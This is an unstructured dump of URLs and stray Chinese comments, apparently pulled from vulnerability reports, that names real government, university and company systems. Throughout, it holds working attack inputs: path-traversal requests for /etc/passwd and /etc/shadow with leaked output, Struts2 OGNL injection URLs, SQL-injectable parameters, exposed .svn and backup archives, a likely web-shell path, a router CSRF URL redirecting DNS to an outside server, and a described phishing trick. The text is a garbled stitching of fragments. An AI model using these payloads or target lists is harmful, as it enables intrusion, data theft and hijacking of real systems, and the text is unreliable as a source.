http://my.qy6.com/sentmsglist.php http://admin.ev123.com/login.php http://211.143.61.213/R_action/loginAction/login.action http://js.passport.189.cn:18080/BME/udb/ http://js.passport.189.cn:18080/ http://js.passport.189.cn:18080/BME/frameset/login.action http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/bindDevice.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/configURLAdd.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/deviceKeyAdd.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/deviceAdd.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/deviceKeyModify.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/iptvUserActive.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/pwdValidTimeSet.jsp 
http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/uploadNum.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/uploadUserID.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/web/useractivate.jsp http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/help/udb_opg/img/ http://js.passport.189.cn:18080/BME/udb/managerportal/jsp/help/system.htm http://js.passport.189.cn:18080/BME/udb/redirect/jsp/web/wlanportal.jsp http://hb.passport.189.cn:18080/ http://jx.passport.189.cn:18080/BME/udb/redirect/jsp/web/j.jsp其他应该还有吧 http://nbadata.m.sohu.com/存在明显的注入漏洞,并且连接数据库的用户权限比较大,可以跨库查询多个数据库中的敏感信息。 www.nfsqtzs.com.cn http://ims.nfsq.com.cn:8191/xplatform/ http://cms.nfsq.com.cn:8186/app/clientManage1!redictReg.action?cflag=1 http://www.weekedu.com/web_Org/Class_Info.aspx?infoid=4142&courseid=4134 http://www.weekedu.com/web_Org/Class_Info.aspx?infoid=4142&courseid=4134 http://www.52xinyou.cn/anli.htm http://www.teiyi.com/,对不起,让你受苦了。 http://www.teiyi.com/payment/yee_mobile.aspx?code=UNICOM http://api.m.kfc.com.cn/.svn/entries多处svn信息 http://tdemo002mp.v5portal.com/ http://tdemo002mp.v5portal.com/member/groupbuy.ashx?id=1 http://oa.king.tcl.com/management/Regeist/Region.aspx http://oa.king.tcl.com/management/Regeist/Region.aspx http://121.14.161.91:8090/logs/ http://zhaopin.cntmi.com/ http://zhaopin.cntmi.com/hr/.svn/ http://zhaopin.cntmi.com/images/.svn/entries http://zhaopin.cntmi.com/news/.svn/entries http://zhaopin.cntmi.com/inc/.svn/entries http://zhaopin.cntmi.com/index/.svn/entries http://zhaopin.cntmi.com/logs/.svn/entries http://zhaopin.cntmi.com/menu/.svn/entries http://zhaopin.cntmi.com/src/.svn/entries http://zhaopin.cntmi.com/user/.svn/entries http://zhaopin.cntmi.com/jspbrowser/.svn/entries http://zhaopin.cntmi.com/jspbrowser/Browser.jsp,上传任意类型文件。 http://124.238.219.44/ http://webtest.dagexing.com/web/index/portal.action http://dls.zzu.edu.cn/dls.zzu.rar 
http://121.8.99.66/admin/login.action;jsessionid=4F4C8A94EAB4185A3251FDE2E7203B05 http://api.cy.daoyoudao.com/app/diydishlist.do http://api.cy.daoyoudao.com/wooyun.txt http://xiaoxi.daoyoudao.com/user/login_check.do http://xiaoxi.daoyoudao.com/wooyun.txt http://push.daoyoudao.com/cms/upload/execute.do http://t.caijing.com.cn/u/208075 http://hrclub.51job.com/ hrclub.51job.com/blog/user_setting.asp http://v.lefu8.com/customer/operatorLogin.action http://v.lefu8.com/agent/operatorLogin.action http://www.smsic.cn/show/news/showDetail.do?tsNews.id=2744&tsNews.cateid=160 http://www.langzhong.gov.cn/content.asp?id=2 http://pdscore.pconline.com.cn/util/cvs.jsp页面 http://b2b.sogou.com/search/products.do www.qiboot.com www.360shop.com.cn ubuntu:/tmp$ www.qiboot.com http://c.fa.jd.com/adclick?url=http://dujia.jd.com:@www.baidu.com# http://kf1.web08.net/webCompany.php?arg=weibods&style=1&kflist=off%27&kf=&zdkf_type=1&language=zh-cn&charset=gbk&username=&userinfo=&introurl=&lyurl=&lytype=0&copartner=&referer=http%3A%2F%2Flocalhost%2Farticle.aspx%3Fid%3D647&keyword=http%3A%2F%2Flocalhost%2Fzhenduan.aspx&brief=&logo=&question= http://www.jllongtan.gov.cn/leichinews/onews.asp?id=200 http://www.jllongtan.gov.cn/leichinews/onews.asp?id=200 http://xwxt.sict.ac.cn/channel/a001/template.asp?id=97 http://t.caijing.com.cn/bq/?bqid=187 http://bbs.kongzhong.com http://bbs.acr.kongzhong.com http://bbs.b3.kongzhong.com http://bbs.cc.kongzhong.com http://bbs.djz.kongzhong.com http://bbs.gw2.kongzhong.com http://bbs.jj.kongzhong.com http://bbs.ll.kongzhong.com http://bbs.lm.kongzhong.com http://bbs.mil.kongzhong.com http://bbs.oc.kongzhong.com http://bbs.wot.kongzhong.com http://bbs.wowp.kongzhong.com http://bbs.xlx.kongzhong.com http://bbs.zhan.kongzhong.com http://bbshero.kongzhong.com www.cpdc.com.cn http://navi.nlc.gov.cn/repository/conferenceShow.php?id=30028 http://www.zbedu.gov.cn/sunadmin/Editer/ http://www.zbedu.gov.cn/sunadmin/Admin/Collect/SunData/ 
http://www.hbepb.gov.cn/images/infoview/ http://www.txldbz.gov.cn/txlddown/ http://www.ytstc.gov.cn/UploadSoft/ http://www.hzzbw.gov.cn/Data/ http://3chuang.nau.edu.cn/sanchuang/admin/admin/adminlogin.asp http://124.207.29.201/zygg_fb/wzcp/wzcp.asp www.stampprint.com.cn http://szjxb.nau.edu.cn/admin/ t.caijing.com.cn/u/34641 http://up.53kf.com/bglogin_mini.php,注入参数是(POST):domain_name http://up.53kf.com:80/new.php?id=2370&city=no http://cnpostair.bjsx12.host.35.com/yndt.asp?id=152 http://cnpostair.bjsx12.host.35.com/dt.asp?xwclass=%C6%F3%D2%B5%D0%C2%CE%C5 http://cnpostair.bjsx12.host.35.com/gk.asp?xwClass=%B9%AB%CB%BE%BC%F2%BD%E9 http://cnpostair.bjsx12.host.35.com/gl.asp?xwClass=%C9%FA%B2%FA%D0%C5%CF%A2 http://cnpostair.bjsx12.host.35.com/yndt.asp?id=152 http://cnpostair.bjsx12.host.35.com/yndt.asp?id=152 http://jingfan.tcl.com/sf/Company.asp?id=1 http://www.js11183.com:87/ http://tjxt.idgrow.com/physical/studentbaseinfo/StudentBaseInfoAction.a就可以访问到任意学生的个人基本信息,包括生日、学校等。 http://www.3988idc.com/123.rar http://zf.chinapost.com.cn/index.do acad.cnki.net/KNS/brief/result.aspx?dbprefix=CJFQ http://v.baidu.com/kan/ugcrp/?topn=12&title=dwadwa&iid=3420976387-2222773299&url=http%3A%2F%2Furl.cn%2FWImHqW http://yb.3xhdtube.com/?id=1912644925 http://url.cn/WImHqW http://www.jlpost.com.cn/ http://www.jlpost.com.cn/web.rar http://220.181.109.73:8080/login.action http://www.zjpost.com/post/newsDetails.do?newsID=1911 http://guangchangwu.vcu.ku6.com/index.php?m=admin&c=index&a=login&pc_hash= http://www.cctv6.cn/ftp/ http://video.sunland.org.cn/back/login.action http://58.49.103.231:8081/fzsb/login/login.action http://fc.118100.cn/index.php/website/modPassword?userid=506 http://www.hnpost.com/ http://219.141.185.85/ http://ufsdp.ufida.com/Default.aspx?Rurl=http%3a%2f%2f219.141.185.85%3a80%2flogin.aspx http://mail.chinasarft.gov.cn/ http://lljiuzhu.mca.gov.cn/web/UserAction.do?method=getLoginInfo http://219.239.44.26/UDS/Views/Home/Index.aspx http://219.239.44.183/ 
http://219.239.44.63/main/frame.asp?language=Chinese&site_id=MjA4&service_type=MA==#中国气象局培训中心同步教学平台系统 http://admin.apppark.cn/adApp_list.action?adApp.type=2 http://www.hainanpost.cn/news_list.asp?cataid=18874368 http://www.hqkd.cn http://pan.baidu.com/s/1lEFzo http://219.141.185.52/ http://219.141.185.52/fangxia/Config/Connetion.xml http://zhidao.baidu.com/profask?cid=12 http://www.eset.com.cn/eset/hack.php http://test.frisochina.com/Admin/fckeditor/editor/filemanager/connectors/test.html http://love.hspost.com.cn/ http://event.youku.com/DS3/index.php http://event.youku.com/pizzahut/student/index.php?id=76&cid= URL:http://wap.12321.cn/rlist.php?category=%25E5%25AE%259E%25E7%2594%25A8%25E6%258A%2580%25E5%25B7%25A7&page=4 http://www.12321.cn/Admin.html http://www.12321.cn/edit/editor.htm www.12321.cn/edit/editor/img.htm http://218.85.73.164:8088/infogate/file/file_server_read.jsp?FileName=/../../../../../../../../../etc/shadow D328Z0:16028:0:99999:7 http://wooyun.org/bugs/wooyun-2014-047873 http://www.fexion.com/feedback/admin_login.htm http:/target/sitestar/admin/index.php?_m=../../robots.txt%00&_a=admin_add http://target/sitestar/admin/index.php?_m=../../../../../../../../../../windows/win.ini%00.jpg&_a=admin_add http://target/sitestar/admin/index.php?_m=../../../../../../../../../../etc/passwd%00.jpg&_a=admin_add http://vrm.lafaso.com/login/login.htm http://www.iswg.cn/new_wordpress/?s=W http://dxz.baomihua.com/gameindex.aspx http://dzpk.baomihua.com/ http://tdyx.baomihua.com/ http://www.cec.gov.cn/phpsso_server/uploadfile/avatar/1/5/4419/1/1/ice.php http://chaogu.ifeng.com http://chaogu.ifeng.com/syb?search=1 http://chaogu.ifeng.com/syb?search=1 http://www.tj12319.cn/callcenter!home.action http://www.tj12319.cn/ic.jsp http://s1.pplive.cn/sta.js/.php https://sso-cas.pplive.cn:8443/cas/login http://zt.pptv.com/edithelp/ http://zt.pptv.com/edithelp/webzt.html http://zt.pptv.com/edithelp/cmszttymb.html http://zt.pptv.com/edithelp/ztsearchhelp.html 
http://211.142.30.188/proj_phoneplay/front/index!index.action http://211.142.30.188/proj_phoneplay/front/index!index.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://211.142.30.188/proj_phoneplay/1.jsp http://218.26.42.141:8080/unicom-moa/admin/public!login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRe http://xsc.cuc.edu.cn/public/login/tealogin.jsp http://219.142.121.44 http://www.tyx.bnu.edu.cn/Admin.aspx http://114.255.218.74/ http://irs.bnu.edu.cn/phpmyadmin/index.php?token=2b0fa795efdf97ddce04b0d80466cf27&db=1 http://ires.cn/inst/medi/index.php http://www.hunantv.com/v/2013/wsgs2/ http://info.peaksport.com//UpdateLog/UpdateList.aspx?LogID=153 http://www.sdzx.gov.cn/zxhy.php?id=308 http://www.cpdm.com.cn/ http://www.cpdm.com.cn/shzx/ http://www.parkson.com.cn/index.html http://baidu.com http://open.kongzhong.com/ http://3mchina.51job.com/sc/esearch_result.php http://www.hvri.ac.cn/newsdetail.aspx?id=3508 http://www.sxagri.ac.cn:80//shiyjs1.asp?kind=4 http://ct.homeinns.com/Login.aspx这个也行,主站前台登陆也可以··· http://zf.chinapost.com.cn/index.do http://www.hfxzzx.gov.cn/sscms/siteserver/Installer/default.aspx http://xxgk.linfen.gov.cn/SiteServer/installer/default.aspx http://chaxun.ahjt.gov.cn/SiteServer/installer/SqlServer.aspx http://gongkai.houma.gov.cn/SiteServer/installer/SqlServer.aspx http://www.yjzjj.gov.cn/houtai http://www.ynta.gov.cn/index.aspx中的项目管理系统,景区管理系统等。 http://xm.ynta.gov.cn/trip/ 
http://yjs.ciomp.ac.cn:80//more.php?more_id=3 http://yjs.ciomp.ac.cn/file http://yjs.ciomp.ac.cn/zfm1/test.php http://yjs.ciomp.ac.cn/zfm3/test.php http://123.***.***.***:8081/ http://data.snet.com.cn/cms/manage/sort/a.jsp?s_parent_id=17 http://pages.tom.com/.svn/entries http://192.168.24.67:8088/svn/pagemaker/release/release090407 http://192.168.24.67:8088/svn/pagemaker svn:special svn:externals svn:needs-lock https://passport.sogou-inc.com/.svn/entries http://pages.caicai98.tom.com/.svn/entries http://pub.beta.ulechina.tom.com/ http://pub.beta.ulechina.tom.com/.svn/entries http://home.focus.cn/msgview/1632/270131257.html http://dgbest.tom.com/ http://dgbest.tom.com/.svn/entries http://live.sports.tom.com/ http://live.sports.tom.com/.svn/entries http://pic.game.tom.com/.svn/entries http://flash.game.tom.com/.svn/entries http://hi.tom.com/ http://hi.tom.com/.svn/entries http://yy.teatree.cn http://bbs.lenovo.com/utility/restore.php http://zhaopin.aoe.ac.cn/notice/gonggao-readcheck.jsp?id=11 http://dj.cnr.cn/index.php?option=default,view http://sqlmap.org http://tousu.auto.sohu.com)随便点个投诉进去评论插入xss代码 http://tousu.auto.sohu.com/tousu14499.shtml)这里插入代码 http://hangye.letv.com/ http://yuntv.letv.com/域名下的视频耐 http://g3.letv.com/32/7/84/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-0.jpg http://g3.letv.com/37/53/63/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-1.jpg http://g3.letv.com/34/4/73/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-10.jpg http://g3.letv.com/37/40/79/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-11.jpg http://g3.letv.com/40/4/86/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-12.jpg http://g3.letv.com/34/25/87/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-13.jpg 
http://g3.letv.com/34/22/2/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-14.jpg http://g3.letv.com/38/46/93/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-15.jpg http://g3.letv.com/40/11/59/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-16.jpg http://g3.letv.com/40/28/23/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-17.jpg http://g3.letv.com/38/28/61/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-18.jpg http://g3.letv.com/36/15/25/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-19.jpg http://g3.letv.com/39/48/110/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-2.jpg http://g3.letv.com/33/21/8/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-20.jpg http://g3.letv.com/35/43/40/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-21.jpg http://g3.letv.com/35/43/96/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-22.jpg http://g3.letv.com/34/39/95/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-23.jpg http://g3.letv.com/33/15/107/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-24.jpg http://g3.letv.com/38/2/32/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-25.jpg http://g3.letv.com/40/50/90/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-26.jpg http://g3.letv.com/40/41/91/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-27.jpg 
http://g3.letv.com/32/1/73/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-28.jpg http://g3.letv.com/35/5/104/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-29.jpg http://g3.letv.com/38/15/109/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-3.jpg http://g3.letv.com/37/21/93/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-30.jpg http://g3.letv.com/35/48/29/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-31.jpg http://g3.letv.com/40/47/113/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-4.jpg http://g3.letv.com/37/50/73/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-5.jpg http://g3.letv.com/33/1/13/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-6.jpg http://g3.letv.com/33/20/32/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-7.jpg http://g3.letv.com/34/24/14/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-8.jpg http://g3.letv.com/32/37/38/letvhangye/SRC/pdf/56/95/1dded91e4457e1a0eb898c6f4579cd97/1dded91e4457e1a0eb898c6f4579cd97-9.jpg http://116.228.55.39/login.jsp http://stat.hjsm.tom.com/ http://stat.hjsm.tom.com/.svn/entries http://chat.skype.tom.com/.svn/entries http://www.maxen.com.cn/ http://www.maxen.com.cn/manage/login.php http://cq.ip66.com/m/manager/login.php http://hr.sf-express.com http://m.inewsweek.cn/politics/detail.php?id=77851 http://tea.ac.cn/resume.asp?orderid=207 http://wx.locojoy.com:8028/BindAccount/BindJumpUrl?microMessageAccount=2&rnd=9011332623 http://admin.eguan.cn/admin.php http://www.yonyou.com.hk/new/content.php?uid=88&sid=107 http://221.176.65.1/ 
http://www.baidu.com/s?ie=utf-8&bs=site%3Azhcw.com+%2Fxinwen%2Fbocai&f=8&rsv_bp=1&rsv_spt=3&wd=site%3Azhcw.com+inurl%3A%2Fxinwen%2Fbocai&rsv_sug3=8&rsv_sug4=433&rsv_sug2=0&inputT=1 http://xlzx.nau.edu.cn/1.rar http://author.ks.91.com:80/resources/html/authorreadhelp.aspx?flag=*&stamp=20121008152034189 http://blog.jobui.com/ http://www.youneng.com/Manager/LoginLocation.aspx www.youneng.com http://www.youneng.com http://zx.nau.edu.cn/admin/ewebeditor/admin http://zkzs.nau.edu.cn/wooyun.txt http://wlgc.nau.edu.cn/1.txt http://kf.1000kf.com/company.php?arg=1000kf发现参数arg存在sql注入 http://im1.168kf.com/webCompany.php?arg=168kf也是arg参数有sql注入 http://218.94.42.139:85/FrameSet/Login.aspx http://115.182.35.80/login.jsp http://122.225.108.2:8080/accounts/login/?next=/data/index/ http://www.nimrf.net.cn/ept/eptDxtp.action?bbType=1 http://www.nimrf.net.cn/ept/eptDxtp.action?bbType=1 http://www.nimrf.net.cn/ept/eptDxtp.action?bbType=1 http://60.247.10.152:15000/Frame.action http://60.247.10.152:15000/IndexWeihu.action http://java.sun.com/ http://m.anjuke.com/ http://m.anjuke.com/center,点击我要提问,然后输入 http://www.22168168.com/SiteFiles/BackupFiles/2012-08/Templates_2012-08-02-14-30.xml http://www.22168168.com/SiteFiles/BackupFiles/2013-12/Site_2013-12-07-10-35.zip http://audio.cnr.cn/index.php?option=com_content&ItemId=794 http://audio.cnr.cn/index.php?option=com_conte http://sqlmap.org http://www.enfodesk.com http://www.enfodesk.com/SMinisite/newinfo/muserlogin/nand_id/1 http://vip.taobao.com/tjb/raffle.htm?spm=0.0.0.0.h0q414 http://coolcampdv2011.xdf.cn http://coolcampdv2011.xdf.cn/advideo/adindex.php http://20zn.sz.xdf.cn/admin/admin_login.php http://20zn.sz.xdf.cn/admin/admin_login.php http://workflow.tclhk.com/workflow/Login.aspx http://workflow.tclhk.com/workflow/Login.aspx http://www.7cha.com/index.php http://yh1.staff.xdf.cn:28080/yhebp/flex/YhebpApplication.html http://ekt1.wangqi.com/webCompany.php?arg=shcjyy http://adtracker-wb.crm.leju.com http://adtracker.crm.leju.com 
http://model.ligui.com/m_content.php?id=1107261 http://www.cnu.edu.cn/editortpxx/upload.jsp http://www.lnlaw.gov.cn http://ucard.nenu.edu.cn/EcardDevelopment/index/index_index.action http://demo.pinphp.com/index.php?m=message&a=talk&ftid=22 http://cbscr.iim.ac.cn/keyan_show.php?k_id=52 http://www.okwei.com/cpxq.html?pNO=2506 http://nsec.koolearn.com/subject/kyds/haixuan2013/more.jsp?configId=1&name=q&tal=5286 http://www.douban.com/misc/audit_report?url= http://q.115.com/t-2454-32191.html http://b2b.gigabyte.cn/Login.aspx?ReturnUrl=%2fHome.aspx https://117.121.4.6/ http://class.bjut.edu.cn/OpenCourse/International/iCourse!getOuterCourse.do http://www.ynfnrs.gov.cn/user/Login.asp http://trip.cash.xunlei.com/ http://trip.cash.xunlei.com/.svn/entries http://wangba.kongzhong.com/netcafe/nblist.jsp http://wangba.kongzhong.com/netcafe/frags_list.jsp http://wangba.kongzhong.com/netcafe/frags_list.jsp http://wangba.kongzhong.com/netcafe/frags_list.jsp http://pk.tom.com/web/index.html http://www.onecaresone.com/sch_list.php?cno=1&vname=%E6%98%AD%E8%A7%89%E5%8E%BF%E6%96%B0%E5%9F%8E%E9%95%87%E5%8F%A4%E6%9B%B2%E6%9D%91 http://t.91.com/597437454 http://www.shopnctest.com/c2c/2013/test/ url:http://www.shopnctest.com/c2c/2013/test/mobile/28aeb56bf14c9a5f826f8ad65bc6d7f0.php?commend=order_detail&order_id=570 http://demo.destoon.com/v5.0上弄的。 http://landinfo.mlr.gov.cn/login.do?state=publicFilesDownload&filename=../../../../../../../../../etc/passwd http://cks.mof.gov.cn/crifs/content/docmanage/download.jsp?filePath=../../../../../../etc/passwd http://211.94.187.231/dcdy/download?path=../../../../../../../../../../etc/passwd http://www.hnea.gov.cn/manage/content/docmanage/download.jsp?filePath=/../../../../../../etc/passwd http://www.dsi.gov.mo/srvDownloadFile.do?file_name=../../../../../../../../../../etc/passwd http://ids.gzstats.gov.cn/ids/admin/debug/fv.jsp?f=/../../../../../../../etc/passwd 
http://www.ansteel.com.cn/main/down.jsp?filePath=/../../../../../../../../../../../../../../../etc/passwd&fileName=1.txt http://wap.118114.cn/bst/star/c.jsp?fr=bst&t=../../../../../../../../etc/passwd http://bid.zte.com.cn/com/zte/product/ui/web/Application/Default.aspx http://www.ectrip.com/product.html http://www.weekedu.com/web_Org/Notice_info.aspx?infoid=20 http://www.weekedu.com/web_Org/news_info.aspx?infoid=3 http://www.weekedu.com/web_Org/Notice_info.aspx?infoid=20 http://demo18.foxitsoftware.com/eng/login/checkemail.aspx?email=1 http://www.ecard.ldu.edu.cn/ggxxfb.action?lmid=4a42b0f33184b86501318ed87efa0002 http://yktcx.tjut.edu.cn/ggxxfb.action?lmid=40288a87410729660141072ebb060003 http://xyk.jlnu.edu.cn/xxsearch.action?lmid=4028868e1fb19cc7011fd12306690004 http://ecard.sdupsl.edu.cn/ggxxfb.action?lmid=8a8a8a882c33a432012c529df1f90002 http://ecard.qau.edu.cn/xxsearch.action?lmid=8a8a008d234f481601234f6f846c0001 http://ecard.sdwz.cn/ggxxfb.action?lmid=2c918186341c2a1d01341c2d40e90001 http://210.44.8.36/ggxxfb.action?lmid=5e4eb0f4314baec10132a488c6e40003 http://ecard.tust.edu.cn/ggxxfb.action?lmid=529f0a072ba9a271012bc314829d0001 http://ecard.hycollege.net/ggxxfb.action?lmid=4028057026fa7f230126fd98223a0001 http://ecard.hbmu.edu.cn/ggxxfb.action?lmid=5a45b18428b996760128b997a4900001 http://card.niit.edu.cn/ggxxfb.action?lmid=529ceadf33304f68013330dbe3aa0003 http://202.114.64.160:8000/ggxxfb.action?lmid=4af2cc861b4d9a8d011b4dd8e1530003 http://ykt.sict.edu.cn/xxsearch.action?lmid=402881862bd34c97012bd34e28b80001 http://yktcx.njmu.edu.cn/ggxxfb.action?lmid=ff80808132360e750132e49e017f0001 http://card.gdufs.edu.cn/ggxxfb.action?lmid=4af441d1251fa1070125206744f40001 http://e.nfu.me/ggxxfb.action?lmid=402881892d2c8252012d2fe00dac0001 http://ykt.hebut.edu.cn/ggxxfb.action?lmid=f39820bc40ee202c0140ee22317d0001 http://ecard.sjtu.edu.cn/ggxxfb.action?lmid=4af8bf44187768c5011887d19c460004 http://card.tjfsu.edu.cn/ggxxfb.action?lmid=53c45f872b236581012b236971950001 
http://ykt.xznu.edu.cn/ggxxfb.action?lmid=4a43c0bd30df88820130df968aee0002 http://card.sdada.edu.cn/ggxxfb.action?lmid= http://ecar.hrbust.edu.cn/ggxxfb.action?lmid= http://ecard.sdu.edu.cn/ggxxfb.action?lmid= http://www.koyimall.com/?act=shop.goods_view&GS=43313 http://m.koyimall.com/?act=shop.goods_view&GS=43313 http://club.show.sina.com.cn/viewthread.php?tid=595162&extra= http://www.csgc.com.cn)某系统多处漏洞缺陷展示 http://www.csgc.com.cn:8080/bsweb/login.jsp http://www.csgc.com.cn:8080/bsweb/login.action http://www.csgc.com.cn:8080/bsweb/download?path= http://www.dongbeiidc.com/web.zip http://60.191.202.167/zjwgy/admin/main.jsp http://www.bzhcw.cn:8088/front/loanApply/loanApplication!goAddLoanApp.action http://www.bzhcw.cn:9090/infointeraction/page/web/getCjwtInfo.action?id=2 http://www.bzhcw.cn:9090/system/loginAction.do http://golf.cctv.com/ http://www.teatreexy.com http://lis.lenovo.com/lots/ http://lis.lenovo.com/lots/forgetpwd.aspx https://passport.wanhui.cn/account/forgetpassword/step1/?wpid=1000292 https://passport.wanhui.cn/account/forgetpassword/step2/?wpid=1000292 http://lis.lenovo.com/LISV2/ http://lis.lenovo.com/RTS/ http://lis.lenovo.com/RTS/forgetpwd.aspx http://www.0000369.cn/index.action http://www.smartshanghai.com/scripts/drivemeto.php?loc_id=-6529 CN:8080,释锐校校用平台。 http://elective.sfls.cn:8080/us/download_file.jsp?path=97-100-103-96-110-42-92-95-104-100-105-40-45-43-44-47-43-44-44-43-43-44-48-52-47-45-40-49-45-47-52-51-48-45-44-49-41-92-110-107-&fileName=44-41-92-110-107-&remote=null http://www.360shop.com.cn http://www.360shop.com.cn:80/ www.360shop.com.cn http://eip.tcl.com http://ego.tcl.com.cn https://kyfw.12306.cn/otn/zwdch/queryCC?train_station_code=SHH http://demo.zoomla.cn/Plugins/Doc.aspx?id=1 http://202.108.9.135/index.action?request_locale=zh_CN http://202.108.9.135/login.action encap:Ethernet d5:b1:52 addr:10.*.*.228 Bcast:10.*.*.255 Mask:255.255.248.0 bff:fed5:b152/64 Scope:Link MTU:1500 packets:1082463247 dropped:1910928390 
packets:900262660 txqueuelen:1000 http://t.jiwu.com/info!detail.action http://sz.jiwu.com/loupan/jjr/15532.html http://chongxianport.com/ http://wed.27.cn/marry/marryadmin/web/.svn/entries http://www.jgs.gov.cn http://www.jgs.gov.cn/www.rar http://www.jgs.gov.cn/fangtan/adminzw/main.asp http://www.jgs.gov.cn/adminzw/login.aspx http://yiqi.taobao.com/,苦寻半天没有任何收获,这时候随意一瞥邀请加入引起了我的注意。 http://bingsec.com?spm=0.0.0.0.LyuuFi http://img01.taobaocdn.com/poster_pic/T1qMpCFrRXXXXXXXXX top:1px http://www.taobao.com,成功的将发送者和其它内容遮挡。用户竟然发现淘宝几百年难得一遇的搞起了大抽奖还是肯定中奖这时候就进入了我们的钓鱼网站圈套啦~ display:none http://www.v5yw.net/bg.jpg http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=&dnsserver=54.248.102.5&dnsserver2=8.8.8.8&Save=%25B1%25A3+%25B4%25E6 http://touch.17u.cn/membership/applylogin.html?returnUrl=%2fdeal%2ftcmemberapplycash.html http://touch.17u.cn http://211.156.193.135/LoginAction.do http://211.156.193.135/DownLoadAction.do http://211.156.193.135/LoginAction.do,发现含有验证码,就直接使用搜索引擎,然后发现了用户名和密码。 http://211.156.193.135/DownLoadAction.do?action=download&fname=../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync 